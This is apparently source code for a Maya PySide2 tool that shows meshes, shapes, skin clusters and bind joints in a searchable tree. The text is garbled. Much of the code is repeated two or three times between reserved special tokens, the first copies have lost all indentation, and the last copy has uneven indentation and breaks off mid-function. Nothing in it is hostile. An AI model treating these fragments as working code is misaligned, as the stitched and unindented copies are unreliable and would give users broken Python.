str_selected = [x.text(0) for x in mySelection]
pm.select(str_selected, r=1)
def filterMeshes(self, filter='all'):
"""
filter:
all : all meshes
skinClusters : all meshes with skinClusters
None
"""
if filter == 'all':
return self.getAllMeshes()
elif filter == 'skinClusters':
clusters = pm.ls(type='skinCluster')
meshesShapes = set(sum([pm.skinCluster(c, q=1, geometry=1) for
c in clusters], []))
meshes = set([x.getParent() for x in meshesShapes if pm.
objectType(x) == 'mesh'])
return meshes
elif filter == 'None':
return None
@staticmethod
def test():
print('test')
@staticmethod
def getSkinCluster(_transform):
"""
Find a SkinCluster from a transform
Returns the skinCluster node
"""
result = []
if not pm.objExists(_transform):
return result
validList = mel.eval('findRelatedDeformer("' + str(_transform) + '")')
if validList is None:
return result
for elem in validList:
if pm.nodeType(elem) == 'skinCluster':
result.append(elem)
pm.select(result, r=True)
result_node = pm.selected()
if len(result_node) > 1:
return result_node
else:
try:
return result_node[0]
except IndexError:
return False
@staticmethod
def getBindJointsFromCluster(clusterList):
"""
Find all joints attached to a skinCluster
@param clusterList: List. list of skin Clusters
return dic with key: skin Cluster. Value: list of joint
"""
bindJoints_dic = {}
for cluster in clusterList:
all_binds_jnts = [x for x in pm.listConnections(str(cluster) +
'.matrix[*]', s=1)]
bindJoints_dic.update({str(cluster): all_binds_jnts})
return bindJoints_dic
@staticmethod
def getAllMeshes():
"""
return: list of all meshes / geometry
"""
shapesList = pm.ls(type='mesh', ni=1)
transformList = list(set(pm.listRelatives(shapesList, parent=True)))
transformList.sort()
return transformList
@staticmethod
def getAllShapes(transforms):
"""
@param transforms: List.
return : dictionnary with key:mesh / values: shapes
"""
shapes_dic = {}
for transform in transforms:
all_shapes = pm.PyNode(transform).getShapes(ni=True)
shapes_dic.update({str(transform): all_shapes})
return shapes_dic
def getSkinClusterbyShape(self, shapes):
"""
get skinCluster attached to the shape
@param shapes: List
return: List
"""
cluster_dic = {}
for shape in shapes:
try:
incoming = mc.listConnections('{}.inMesh'.format(shape))[0]
if pm.objectType(incoming) == 'skinCluster':
cluster_dic.update({str(shape): incoming})
else:
skinCluster = self.getSkinCluster(shape)
if skinCluster:
if len(skinCluster) > 1:
cluster_dic.update({str(shape): 'None'})
else:
cluster_dic.update({str(shape): skinCluster})
else:
cluster_dic.update({str(shape): 'None'})
except TypeError:
cluster_dic.update({str(shape): 'None'})
return cluster_dic
def showUI(dialog=False):
if dialog:
MultiSkin_UI.show_dialog()
else:
global tools_cw_ui
try:
tools_cw_ui.deleteLater()
except:
pass
tools_cw_ui = MultiSkin_UI()
tools_cw_ui.show()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def undo(func):
"""
Puts the wrapped `func` into a single Maya Undo action, then
undoes it when the function enters the finally: block
from schworer Github
"""
@wraps(func)
def _undofunc(*args, **kwargs):
try:
mc.undoInfo(ock=True)
return func(*args, **kwargs)
finally:
mc.undoInfo(cck=True)
return _undofunc
<|reserved_special_token_0|>
class MultiSkin_UI(MayaQWidgetDockableMixin, QtWidgets.QDialog):
__dialog = None
@classmethod
def show_dialog(cls):
if cls.__dialog is None:
cls.__dialog = cls()
else:
cls.__dialog.raise_()
cls.__dialog.show()
def __init__(self, parent=None):
super(MultiSkin_UI, self).__init__(parent=parent)
self.meshTreeWidget = QtWidgets.QTreeWidget()
self.setObjectName('multi skin ui')
self.starting_height = 500
self.starting_width = 390
self.setWindowTitle('adbrower - Multi Skin Tool' + ' v' + str(VERSION))
self.setWindowFlags(QtCore.Qt.Tool)
self.setMinimumWidth(self.starting_width)
self.resize(self.starting_width, self.starting_height)
self.mainBox = QtWidgets.QVBoxLayout()
self.mainBox.setContentsMargins(0, 0, 0, 0)
self.scroll_layout = QtWidgets.QScrollArea()
self.mainBox.addWidget(self.scroll_layout)
self.setLayout(self.mainBox)
self.scroll_layout.setContentsMargins(0, 0, 0, 0)
self.scroll_layout.setWidgetResizable(True)
self.scroll_layout.setFrameStyle(QtWidgets.QFrame.NoFrame)
self.scroll_layout.setFrameShadow(QtWidgets.QFrame.Plain)
self.scroll_widget = QtWidgets.QWidget()
self.scroll_layout.setWidget(self.scroll_widget)
self.main_layout = QtWidgets.QVBoxLayout()
self.main_layout.setContentsMargins(*([5] * 4))
self.main_layout.setSpacing(2)
self.setLayout(self.main_layout)
self.scroll_widget.setLayout(self.main_layout)
self.widgetsAndLayouts()
self.create_Button()
self.buildMainLayout()
def widgetsAndLayouts(self):
def addLine():
line = QtWidgets.QFrame()
line.setFrameShape(QtWidgets.QFrame.HLine)
return line
def addText(message, alignement=QtCore.Qt.AlignCenter, height=30,
bold=False):
myFont = QtGui.QFont()
myFont.setBold(bold)
text = QtWidgets.QLabel(message)
text.setAlignment(alignement)
text.setFixedHeight(height)
text.setFont(myFont)
return text
self.vLayoutAndFunctions = [['treeWidget', [1, 1, 1, 1]]]
self.vlayout = {}
for layoutName, margins in self.vLayoutAndFunctions:
self.vlayout[layoutName] = QtWidgets.QVBoxLayout()
self.vlayout[layoutName].setContentsMargins(margins[0], margins
[1], margins[2], margins[3])
self.hLayoutAndFunctions = [['filterOptions', [1, 1, 1, 1]], [
'buttonsOptions', [1, 1, 1, 1]], ['searchBarWidget', [1, 1, 1, 1]]]
self.hlayout = {}
for layoutName, margins in self.hLayoutAndFunctions:
self.hlayout[layoutName] = QtWidgets.QHBoxLayout()
self.hlayout[layoutName].setContentsMargins(margins[0], margins
[1], margins[2], margins[3])
self.searchBar = QtWidgets.QLineEdit()
self.searchBar.setPlaceholderText('Search...')
self.searchBar.textEdited.connect(self.searchBarEdited)
self.hlayout['searchBarWidget'].addWidget(self.searchBar)
self.matchCaseChx = QtWidgets.QCheckBox()
self.matchCaseChx.setChecked(False)
self.matchCaseChx.setText('Match Case')
self.matchCaseChx.stateChanged.connect(self.searchBarEdited)
self.allFilter = QtWidgets.QRadioButton('All', self)
self.allFilter.setChecked(True)
self.allFilter.toggled.connect(self.refreshQtree)
self.skinClusterFilter = QtWidgets.QRadioButton('Skin Clusters', self)
self.skinClusterFilter.setChecked(True)
self.skinClusterFilter.toggled.connect(self.refreshQtree)
self.meshTreeWidget = QtWidgets.QTreeWidget()
self.meshTreeWidget.setHeaderLabel('Cloth Tree View')
self.meshTreeWidget.setSelectionMode(self.meshTreeWidget.
ExtendedSelection)
self.vlayout['treeWidget'].addWidget(self.meshTreeWidget)
header = QtWidgets.QTreeWidgetItem(['Geometries'])
self.meshTreeWidget.setHeaderItem(header)
self.meshTreeWidget.itemClicked.connect(self.singleClickedAction)
self.meshTreeWidget.itemSelectionChanged.connect(self.
singleClickedAction)
self.refreshQtree()
def create_Button(self):
""" Create the buttons """
self.buttonAndFunctions = [['Show Selected', self.showSelected, 0,
pyQtDic['colorLightGrey'], '', self.hlayout['searchBarWidget'],
'', 30], ['Refresh', self.refreshQtree, 0, pyQtDic[
'colorLightGrey'], '', self.hlayout['filterOptions'], '', 30],
['Clear', self.meshTreeWidget.clear, 0, pyQtDic[
'colorLightGrey'], '', self.hlayout['filterOptions'], '', 30],
['Expand All', self.expandTree, 0, pyQtDic['colorLightGrey'],
'', self.hlayout['buttonsOptions'], '', 30], ['Close All', self
.closeTree, 0, pyQtDic['colorLightGrey'], '', self.hlayout[
'buttonsOptions'], '', 30]]
self.buttons = {}
for buttonName, buttonFunction, _, labColor, bgColor, layout, layout_coord, width in self.buttonAndFunctions:
self.buttons[buttonName] = adbRC.CustomQPushButton(buttonName)
self.buttons[buttonName].clicked.connect(buttonFunction)
try:
layout.addWidget(self.buttons[buttonName], int(layout_coord
.split(',')[0]), int(layout_coord.split(',')[1]))
except ValueError:
layout.addWidget(self.buttons[buttonName])
_optionsExpandAll = self.buttons['Expand All'].addButtonActions([
'Shapes', 'Skin Clusters'])
_optionsExpandAll['Shapes'].triggered.connect(lambda : self.
expandTree('shape'))
_optionsExpandAll['Skin Clusters'].triggered.connect(lambda : self.
expandTree('skin cluster'))
_optionsCloseAll = self.buttons['Close All'].addButtonActions([
'Shapes', 'Skin Clusters'])
_optionsCloseAll['Shapes'].triggered.connect(lambda : self.
closeTree('shape'))
_optionsCloseAll['Skin Clusters'].triggered.connect(lambda : self.
closeTree('skin cluster'))
def buildMainLayout(self):
self.main_layout.addLayout(self.hlayout['filterOptions'])
self.hlayout['filterOptions'].addWidget(self.allFilter)
self.hlayout['filterOptions'].addWidget(self.skinClusterFilter)
self.hlayout['filterOptions'].addStretch()
self.main_layout.addLayout(self.hlayout['searchBarWidget'])
self.hlayout['searchBarWidget'].addWidget(self.matchCaseChx)
self.main_layout.addLayout(self.hlayout['buttonsOptions'])
self.main_layout.addLayout(self.vlayout['treeWidget'])
def refreshQtree(self):
self.meshTreeWidget.clear()
all_status = self.allFilter.isChecked()
if all_status:
_filter = 'all'
else:
_filter = 'skinClusters'
self.filterList = self.filterMeshes(filter=_filter)
self.populateQTree(self.filterList)
def getSearchBarText(self):
searchBarText = self.searchBar.text()
return searchBarText
def searchBarEdited(self):
matchCase = bool(self.matchCaseChx.checkState())
query = self.searchBar.text()
if matchCase:
query_words = str(query).split(' ')
else:
query_words = str(query).lower().split(' ')
query_words = filter(None, query_words)
scoreList = {}
for item in [str(x) for x in self.filterList]:
score = 0
for query_word in query_words:
if matchCase:
if query_word in item:
score += 1
elif query_word in item.lower():
score += 1
scoreList[item] = score
sorted_matches = [i for i in scoreList.items() if i[1] >= len(
query_words)]
sorted_matches = sorted(sorted_matches, key=lambda x: x[0])
sorted_matches_string = [name for name, index in sorted_matches]
self.meshTreeWidget.clear()
self.populateQTree(sorted_matches_string)
def populateQTree(self, filterList):
self.roots = [QtWidgets.QTreeWidgetItem(self.meshTreeWidget, [str(
item)]) for item in filterList]
[root.setIcon(0, QtGui.QIcon(':/out_mesh.png')) for root in self.roots]
[root.setExpanded(True) for root in self.roots]
self.QtShapes = []
shape_dic = self.getAllShapes(self.getAllMeshes())
QTroots_dic = {}
for root in self.roots:
try:
QTroots_dic.update({root: shape_dic[root.text(0)]})
except KeyError:
pass
for QTroot, shapesList in QTroots_dic.items():
[QtWidgets.QTreeWidgetItem(QTroot, [str(shape)]) for shape in
shapesList]
child_count = QTroot.childCount()
children = [QTroot.child(index) for index in range(child_count)]
[child.setForeground(0, QtGui.QBrush(QtGui.QColor(YELLOW))) for
child in children]
[child.setIcon(0, QtGui.QIcon(':/out_transform.png')) for child in
children]
[child.setExpanded(True) for child in children]
[self.QtShapes.append(child) for child in children]
self.QTClusters = []
cluster_dic = self.getSkinClusterbyShape(flatList(shape_dic.values()))
QTshape_dic = {}
for shape in self.QtShapes:
QTshape_dic.update({shape: cluster_dic[shape.text(0)]})
for QTshape, clusterList in QTshape_dic.items():
if clusterList == 'None':
pass
else:
QtWidgets.QTreeWidgetItem(QTshape, [str(clusterList)])
child_count = QTshape.childCount()
children = [QTshape.child(index) for index in range(child_count)]
[child.setForeground(0, QtGui.QBrush(QtGui.QColor(GREEN))) for
child in children]
[child.setIcon(0, QtGui.QIcon(':/cluster.png')) for child in
children]
[self.QTClusters.append(child) for child in children]
bindJoints_dic = self.getBindJointsFromCluster([x for x in
cluster_dic.values() if x != 'None'])
QTcluster_dic = {}
for cluster in self.QTClusters:
QTcluster_dic.update({cluster: bindJoints_dic[cluster.text(0)]})
for QTCluster, jointList in QTcluster_dic.items():
[QtWidgets.QTreeWidgetItem(QTCluster, [str(jnt)]) for jnt in
jointList]
child_count = QTCluster.childCount()
children = [QTCluster.child(index) for index in range(child_count)]
[child.setForeground(0, QtGui.QBrush(QtGui.QColor(DARKRED))) for
child in children]
[child.setIcon(0, QtGui.QIcon(':/out_joint.png')) for child in
children]
def closeTree(self, type='mesh'):
if type == 'mesh':
[root.setExpanded(False) for root in self.roots]
elif type == 'shape':
[shape.setExpanded(False) for shape in self.QtShapes]
elif type == 'skin cluster':
[sclus.setExpanded(False) for sclus in self.QTClusters]
def expandTree(self, type='mesh'):
if type == 'mesh':
[root.setExpanded(True) for root in self.roots]
elif type == 'shape':
[shape.setExpanded(True) for shape in self.QtShapes]
elif type == 'skin cluster':
[sclus.setExpanded(True) for sclus in self.QTClusters]
def showSelected(self):
selection = pm.selected()
selection.sort()
self.meshTreeWidget.clear()
self.populateQTree(selection)
def singleClickedAction(self):
mySelection = self.meshTreeWidget.selectedItems()
str_selected = [x.text(0) for x in mySelection]
pm.select(str_selected, r=1)
def filterMeshes(self, filter='all'):
"""
filter:
all : all meshes
skinClusters : all meshes with skinClusters
None
"""
if filter == 'all':
return self.getAllMeshes()
elif filter == 'skinClusters':
clusters = pm.ls(type='skinCluster')
meshesShapes = set(sum([pm.skinCluster(c, q=1, geometry=1) for
c in clusters], []))
meshes = set([x.getParent() for x in meshesShapes if pm.
objectType(x) == 'mesh'])
return meshes
elif filter == 'None':
return None
@staticmethod
def test():
print('test')
@staticmethod
def getSkinCluster(_transform):
"""
Find a SkinCluster from a transform
Returns the skinCluster node
"""
result = []
if not pm.objExists(_transform):
return result
validList = mel.eval('findRelatedDeformer("' + str(_transform) + '")')
if validList is None:
return result
for elem in validList:
if pm.nodeType(elem) == 'skinCluster':
result.append(elem)
pm.select(result, r=True)
result_node = pm.selected()
if len(result_node) > 1:
return result_node
else:
try:
return result_node[0]
except IndexError:
return False
@staticmethod
def getBindJointsFromCluster(clusterList):
"""
Find all joints attached to a skinCluster
@param clusterList: List. list of skin Clusters
return dic with key: skin Cluster. Value: list of joint
"""
bindJoints_dic = {}
for cluster in clusterList:
all_binds_jnts = [x for x in pm.listConnections(str(cluster) +
'.matrix[*]', s=1)]
bindJoints_dic.update({str(cluster): all_binds_jnts})
return bindJoints_dic
@staticmethod
def getAllMeshes():
"""
return: list of all meshes / geometry
"""
shapesList = pm.ls(type='mesh', ni=1)
transformList = list(set(pm.listRelatives(shapesList, parent=True)))
transformList.sort()
return transformList
@staticmethod
def getAllShapes(transforms):
"""
@param transforms: List.
return : dictionnary with key:mesh / values: shapes
"""
shapes_dic = {}
for transform in transforms:
all_shapes = pm.PyNode(transform).getShapes(ni=True)
shapes_dic.update({str(transform): all_shapes})
return shapes_dic
def getSkinClusterbyShape(self, shapes):
"""
get skinCluster attached to the shape
@param shapes: List
return: List
"""
cluster_dic = {}
for shape in shapes:
try:
incoming = mc.listConnections('{}.inMesh'.format(shape))[0]
if pm.objectType(incoming) == 'skinCluster':
cluster_dic.update({str(shape): incoming})
else:
skinCluster = self.getSkinCluster(shape)
if skinCluster:
if len(skinCluster) > 1:
cluster_dic.update({str(shape): 'None'})
else:
cluster_dic.update({str(shape): skinCluster})
else:
cluster_dic.update({str(shape): 'None'})
except TypeError:
cluster_dic.update({str(shape): 'None'})
return cluster_dic
def showUI(dialog=False):
if dialog:
MultiSkin_UI.show_dialog()
else:
global tools_cw_ui
try:
tools_cw_ui.deleteLater()
except:
pass
tools_cw_ui = MultiSkin_UI()
tools_cw_ui.show()
<|reserved_special_token_1|>
from functools import wraps
import maya.cmds as mc
import maya.mel as mel
import pymel.core as pm
from PySide2 import QtCore, QtGui, QtWidgets
import adb_core.Class__multi_skin as ms
import adbrower
from CollDict import pysideColorDic as pyQtDic
from maya.app.general.mayaMixin import MayaQWidgetDockableMixin
import adb_tools.adb_pyQt.Class__rightClickCustom as adbRC
from maya_script import Adbrower
adb = adbrower.Adbrower()
VERSION = 1.0
PATH_WINDOW = Adbrower.PATH_WINDOW_INIT + 'AppData/Roaming'
PATH_LINUX = Adbrower.PATH_LINUX_INIT
FOLDER_NAME = Adbrower.FOLDER_NAME_INIT
ICONS_FOLDER = Adbrower.ICONS_FOLDER_INIT
YELLOW = '#ffe100'
ORANGE = '#fd651d'
GREEN = '#597A59'
DARKRED = '#745a54'
def undo(func):
    """
    Puts the wrapped `func` into a single Maya undo chunk; the chunk is
    closed when the function enters the finally: block
    (from schworer's GitHub)
    """
@wraps(func)
def _undofunc(*args, **kwargs):
try:
# start an undo chunk
mc.undoInfo(ock=True)
return func(*args, **kwargs)
finally:
# after calling the func, end the undo chunk
mc.undoInfo(cck=True)
return _undofunc
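# Usage sketch (hypothetical example, not part of the tool): decorating a
# function so all of its scene edits collapse into a single undo step in Maya.
#
# @undo
# def renamePrefix(prefix='geo_'):
#     for node in pm.selected():
#         node.rename(prefix + node.nodeName())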
def flatList(ori_list=''):
"""
Flatten a list
"""
flat_list = []
for item in ori_list:
if isinstance(item, list):
for sub_item in item:
flat_list.append(sub_item)
else:
flat_list.append(item)
return flat_list
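# Example: flatList([['a', 'b'], 'c']) returns ['a', 'b', 'c'].
# Note that only one level of nesting is flattened.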
#-----------------------------------
# CLASS
#-----------------------------------
class MultiSkin_UI(MayaQWidgetDockableMixin, QtWidgets.QDialog):
__dialog = None
@classmethod
def show_dialog(cls):
if cls.__dialog is None:
cls.__dialog = cls()
else:
cls.__dialog.raise_()
cls.__dialog.show()
    def __init__(self, parent=None):
        super(MultiSkin_UI, self).__init__(parent=parent)
        # Placeholder so the attribute exists early; rebuilt in widgetsAndLayouts()
        self.meshTreeWidget = QtWidgets.QTreeWidget()
self.setObjectName('multi skin ui')
self.starting_height = 500
self.starting_width = 390
self.setWindowTitle('adbrower - Multi Skin Tool' + ' v' + str(VERSION))
self.setWindowFlags(QtCore.Qt.Tool)
self.setMinimumWidth(self.starting_width)
self.resize(self.starting_width, self.starting_height)
# -----------------------------
# --- Create scrollArea
self.mainBox = QtWidgets.QVBoxLayout()
self.mainBox.setContentsMargins(0, 0, 0, 0)
self.scroll_layout = QtWidgets.QScrollArea()
self.mainBox.addWidget(self.scroll_layout)
self.setLayout(self.mainBox)
self.scroll_layout.setContentsMargins(0, 0, 0, 0)
self.scroll_layout.setWidgetResizable(True)
self.scroll_layout.setFrameStyle(QtWidgets.QFrame.NoFrame)
self.scroll_layout.setFrameShadow(QtWidgets.QFrame.Plain)
self.scroll_widget = QtWidgets.QWidget()
self.scroll_layout.setWidget(self.scroll_widget)
# -----------------------------
# --- Main Layout
        self.main_layout = QtWidgets.QVBoxLayout()
        self.main_layout.setContentsMargins(*[5] * 4)
        self.main_layout.setSpacing(2)
        # The dialog already owns self.mainBox; main_layout is installed on the
        # scroll widget only (a second self.setLayout() call would be ignored by Qt)
        self.scroll_widget.setLayout(self.main_layout)
self.widgetsAndLayouts()
self.create_Button()
self.buildMainLayout()
def widgetsAndLayouts(self):
# --------- Predefine widgets
def addLine():
            line = QtWidgets.QFrame()
line.setFrameShape(QtWidgets.QFrame.HLine)
return line
def addText(message, alignement=QtCore.Qt.AlignCenter, height=30, bold=False):
myFont = QtGui.QFont()
myFont.setBold(bold)
text = QtWidgets.QLabel(message)
text.setAlignment(alignement)
text.setFixedHeight(height)
text.setFont(myFont)
return text
# ------------------------------
#--------- Layouts
self.vLayoutAndFunctions = [
# name, margins
['treeWidget', [1, 1, 1, 1]],
]
self.vlayout = {}
        for layoutName, margins in self.vLayoutAndFunctions:
            self.vlayout[layoutName] = QtWidgets.QVBoxLayout()
            self.vlayout[layoutName].setContentsMargins(margins[0], margins[1], margins[2], margins[3])
self.hLayoutAndFunctions = [
# name, margins
['filterOptions', [1, 1, 1, 1]],
['buttonsOptions', [1, 1, 1, 1]],
['searchBarWidget', [1, 1, 1, 1]],
]
self.hlayout = {}
        for layoutName, margins in self.hLayoutAndFunctions:
            self.hlayout[layoutName] = QtWidgets.QHBoxLayout()
            self.hlayout[layoutName].setContentsMargins(margins[0], margins[1], margins[2], margins[3])
# ------------------------------
# --------- QLINE EDIT WIDGET
self.searchBar = QtWidgets.QLineEdit()
self.searchBar.setPlaceholderText('Search...')
self.searchBar.textEdited.connect(self.searchBarEdited)
self.hlayout['searchBarWidget'].addWidget(self.searchBar)
# ------------------------------
# --------- CHECKBOX WIDGET
self.matchCaseChx = QtWidgets.QCheckBox()
self.matchCaseChx.setChecked(False)
self.matchCaseChx.setText('Match Case')
self.matchCaseChx.stateChanged.connect(self.searchBarEdited)
# ------------------------------
# --------- RADIO BUTTON WIDGET
        self.allFilter = QtWidgets.QRadioButton('All', self)
        self.allFilter.setChecked(True)
        self.allFilter.toggled.connect(self.refreshQtree)
        self.skinClusterFilter = QtWidgets.QRadioButton('Skin Clusters', self)
        # Radio buttons with the same parent are mutually exclusive; only the
        # 'All' filter starts checked
        self.skinClusterFilter.setChecked(False)
        self.skinClusterFilter.toggled.connect(self.refreshQtree)
# ------------------------------
# --------- TREE LIST WIDGET
        self.meshTreeWidget = QtWidgets.QTreeWidget()
        self.meshTreeWidget.setHeaderLabel('Cloth Tree View')
        self.meshTreeWidget.setSelectionMode(self.meshTreeWidget.ExtendedSelection)
        self.vlayout['treeWidget'].addWidget(self.meshTreeWidget)
        header = QtWidgets.QTreeWidgetItem(['Geometries'])
        self.meshTreeWidget.setHeaderItem(header)
        self.meshTreeWidget.itemClicked.connect(self.singleClickedAction)
        self.meshTreeWidget.itemSelectionChanged.connect(self.singleClickedAction)
self.refreshQtree()
def create_Button(self):
""" Create the buttons """
self.buttonAndFunctions = [
            # name, function, group number, labelColor, backgroundColor, layout, layout_coordinate, width
['Show Selected', self.showSelected, 0, pyQtDic['colorLightGrey'], '', self.hlayout['searchBarWidget'], '', 30],
['Refresh', self.refreshQtree, 0, pyQtDic['colorLightGrey'], '', self.hlayout['filterOptions'], '', 30],
['Clear', self.meshTreeWidget.clear, 0, pyQtDic['colorLightGrey'], '', self.hlayout['filterOptions'], '', 30],
['Expand All', self.expandTree, 0, pyQtDic['colorLightGrey'], '', self.hlayout['buttonsOptions'], '', 30],
['Close All', self.closeTree, 0, pyQtDic['colorLightGrey'], '', self.hlayout['buttonsOptions'], '', 30],
]
# Build Buttons
self.buttons = {}
        for buttonName, buttonFunction, _, labColor, bgColor, layout, layout_coord, width in self.buttonAndFunctions:
self.buttons[buttonName] = adbRC.CustomQPushButton(buttonName)
self.buttons[buttonName].clicked.connect(buttonFunction)
try:
layout.addWidget(self.buttons[buttonName], int(layout_coord.split(',')[0]), int(layout_coord.split(',')[1]))
except ValueError:
layout.addWidget(self.buttons[buttonName])
        # Add right-click options
        _optionsExpandAll = self.buttons['Expand All'].addButtonActions(['Shapes', 'Skin Clusters'])
        _optionsExpandAll['Shapes'].triggered.connect(lambda: self.expandTree('shape'))
        _optionsExpandAll['Skin Clusters'].triggered.connect(lambda: self.expandTree('skin cluster'))
        _optionsCloseAll = self.buttons['Close All'].addButtonActions(['Shapes', 'Skin Clusters'])
        _optionsCloseAll['Shapes'].triggered.connect(lambda: self.closeTree('shape'))
        _optionsCloseAll['Skin Clusters'].triggered.connect(lambda: self.closeTree('skin cluster'))
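    # Note on layout_coord above: a value like '0,1' would be split into grid
    # coordinates (row 0, column 1) for a QGridLayout; the empty strings used
    # here raise ValueError on int('') and fall back to the plain addWidget call.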
def buildMainLayout(self):
# ------------------------------
# --------- BUILD MAIN LAYOUT
self.main_layout.addLayout(self.hlayout['filterOptions'])
self.hlayout['filterOptions'].addWidget(self.allFilter)
self.hlayout['filterOptions'].addWidget(self.skinClusterFilter)
self.hlayout['filterOptions'].addStretch()
self.main_layout.addLayout(self.hlayout['searchBarWidget'])
self.hlayout['searchBarWidget'].addWidget(self.matchCaseChx)
self.main_layout.addLayout(self.hlayout['buttonsOptions'])
self.main_layout.addLayout(self.vlayout['treeWidget'])
# ==================================
# SLOTS
# ==================================
def refreshQtree(self):
self.meshTreeWidget.clear()
all_status = self.allFilter.isChecked()
if all_status:
_filter = 'all'
else:
_filter = 'skinClusters'
self.filterList = self.filterMeshes(filter=_filter)
self.populateQTree(self.filterList)
def getSearchBarText(self):
searchBarText = self.searchBar.text()
return searchBarText
    def searchBarEdited(self):
        matchCase = bool(self.matchCaseChx.checkState())
        query = self.searchBar.text()
        if matchCase:
            query_words = str(query).split(' ')
        else:
            query_words = str(query).lower().split(' ')
        # list() so the words survive repeated iteration and len() under Python 3,
        # where filter() returns a one-shot iterator
        query_words = list(filter(None, query_words))
scoreList = {}
for item in [str(x) for x in self.filterList]:
score = 0
for query_word in query_words:
if matchCase:
if query_word in item:
score += 1
else:
if query_word in item.lower():
score += 1
scoreList[item] = score
        # If the user entered more than one word, keep only items whose score is
        # at least the number of words in the query
        sorted_matches = [i for i in scoreList.items() if i[1] >= len(query_words)]
        # Sort the surviving matches alphabetically by name (x[0] is the item name)
        sorted_matches = sorted(sorted_matches, key=lambda x: x[0])
sorted_matches_string = [name for name, index in sorted_matches]
self.meshTreeWidget.clear()
self.populateQTree(sorted_matches_string)
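    # Scoring sketch (hypothetical names): with the query 'arm geo', an item
    # named 'L_arm_geo' scores 2 (both words match) and survives the
    # >= len(query_words) cut, while 'L_leg_geo' scores 1 and is filtered out.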
def populateQTree(self, filterList):
# Meshes
# ----------------------
self.roots = [QtWidgets.QTreeWidgetItem(self.meshTreeWidget, [str(item)]) for item in filterList]
[root.setIcon(0, QtGui.QIcon(':/out_mesh.png')) for root in self.roots]
[root.setExpanded(True) for root in self.roots]
# Shapes
# ----------------------
self.QtShapes = []
shape_dic = self.getAllShapes(self.getAllMeshes())
        QTroots_dic = {}  # keys are QTreeWidgetItem objects
        for root in self.roots:
            try:
                QTroots_dic.update({root: shape_dic[root.text(0)]})
            except KeyError:
                pass
        # Add the shapes under their mesh
        for QTroot, shapesList in QTroots_dic.items():
            [QtWidgets.QTreeWidgetItem(QTroot, [str(shape)]) for shape in shapesList]
            # Color, tag and expand the shape entries
            child_count = QTroot.childCount()
            children = [QTroot.child(index) for index in range(child_count)]
            [child.setForeground(0, QtGui.QBrush(QtGui.QColor(YELLOW))) for child in children]
            [child.setIcon(0, QtGui.QIcon(':/out_transform.png')) for child in children]
            [child.setExpanded(True) for child in children]
            [self.QtShapes.append(child) for child in children]
# skinClusters
# ----------------------
self.QTClusters = []
cluster_dic = self.getSkinClusterbyShape(flatList(shape_dic.values()))
        QTshape_dic = {}
        for shape in self.QtShapes:
            QTshape_dic.update({shape: cluster_dic[shape.text(0)]})
        # Add the skinCluster under its shape
        for QTshape, clusterList in QTshape_dic.items():
            if clusterList != 'None':
                QtWidgets.QTreeWidgetItem(QTshape, [str(clusterList)])
            # Color and tag the skinCluster entries
            child_count = QTshape.childCount()
            children = [QTshape.child(index) for index in range(child_count)]
            [child.setForeground(0, QtGui.QBrush(QtGui.QColor(GREEN))) for child in children]
            [child.setIcon(0, QtGui.QIcon(':/cluster.png')) for child in children]
            [self.QTClusters.append(child) for child in children]
# Joints
# ----------------------
bindJoints_dic = self.getBindJointsFromCluster([x for x in cluster_dic.values() if x != 'None'])
        QTcluster_dic = {}
        for cluster in self.QTClusters:
            QTcluster_dic.update({cluster: bindJoints_dic[cluster.text(0)]})
        for QTCluster, jointList in QTcluster_dic.items():
            [QtWidgets.QTreeWidgetItem(QTCluster, [str(jnt)]) for jnt in jointList]
            # Color and tag the bind-joint entries
            child_count = QTCluster.childCount()
            children = [QTCluster.child(index) for index in range(child_count)]
            [child.setForeground(0, QtGui.QBrush(QtGui.QColor(DARKRED))) for child in children]
            [child.setIcon(0, QtGui.QIcon(':/out_joint.png')) for child in children]
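    # Resulting tree layout (sketch, names hypothetical):
    #   pCube1                  mesh transform (root)
    #   └─ pCubeShape1          shape, colored YELLOW
    #      └─ skinCluster1      skin cluster, colored GREEN
    #         ├─ joint1         bind joint, colored DARKRED
    #         └─ joint2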
def closeTree(self, type='mesh'):
if type == 'mesh':
[root.setExpanded(False) for root in self.roots]
elif type == 'shape':
[shape.setExpanded(False) for shape in self.QtShapes]
elif type == 'skin cluster':
[sclus.setExpanded(False) for sclus in self.QTClusters]
def expandTree(self, type='mesh'):
if type == 'mesh':
[root.setExpanded(True) for root in self.roots]
elif type == 'shape':
[shape.setExpanded(True) for shape in self.QtShapes]
elif type == 'skin cluster':
[sclus.setExpanded(True) for sclus in self.QTClusters]
def showSelected(self):
selection = pm.selected()
selection.sort()
self.meshTreeWidget.clear()
self.populateQTree(selection)
def singleClickedAction(self):
mySelection = self.meshTreeWidget.selectedItems()
str_selected = [x.text(0) for x in mySelection]
pm.select(str_selected, r=1)
    def filterMeshes(self, filter='all'):
        """
        filter:
            all : all meshes
            skinClusters : all meshes with skinClusters
            None
        """
        if filter == 'all':
            return self.getAllMeshes()
        elif filter == 'skinClusters':
clusters = pm.ls(type='skinCluster')
meshesShapes = set(sum([pm.skinCluster(c, q=1, geometry=1) for c in clusters], []))
meshes = set([x.getParent() for x in meshesShapes if pm.objectType(x) == 'mesh'])
return meshes
elif filter == 'None':
return None
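    # e.g. filterMeshes(filter='skinClusters') returns only the transforms
    # whose shapes are deformed by a skinCluster node.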
# ==================================
# STATIC METHOD
# ==================================
@staticmethod
def test():
        print('test')
@staticmethod
def getSkinCluster(_transform):
"""
Find a SkinCluster from a transform
Returns the skinCluster node
"""
result = []
        if not pm.objExists(_transform):
return result
validList = mel.eval('findRelatedDeformer("' + str(_transform) + '")')
if validList is None:
return result
for elem in validList:
if pm.nodeType(elem) == 'skinCluster':
result.append(elem)
pm.select(result, r=True)
result_node = pm.selected()
if len(result_node) > 1:
return result_node
else:
try:
return result_node[0]
except IndexError:
return False
@staticmethod
def getBindJointsFromCluster(clusterList):
"""
Find all joints attached to a skinCluster
@param clusterList: List. list of skin Clusters
return dic with key: skin Cluster. Value: list of joint
"""
bindJoints_dic = {}
for cluster in clusterList:
all_binds_jnts = [x for x in pm.listConnections(str(cluster) + '.matrix[*]', s=1)]
            bindJoints_dic.update({str(cluster): all_binds_jnts})
return bindJoints_dic
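    # Expected shape of the result (hypothetical names), roughly:
    # {'skinCluster1': [nt.Joint('joint1'), nt.Joint('joint2')], ...}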
@staticmethod
def getAllMeshes():
"""
return: list of all meshes / geometry
"""
shapesList = pm.ls(type="mesh", ni=1)
transformList = list(set(pm.listRelatives(shapesList ,parent=True)))
transformList.sort()
return transformList
@staticmethod
def getAllShapes(transforms):
"""
@param transforms: List.
        return : dictionary with key:mesh / values: shapes
"""
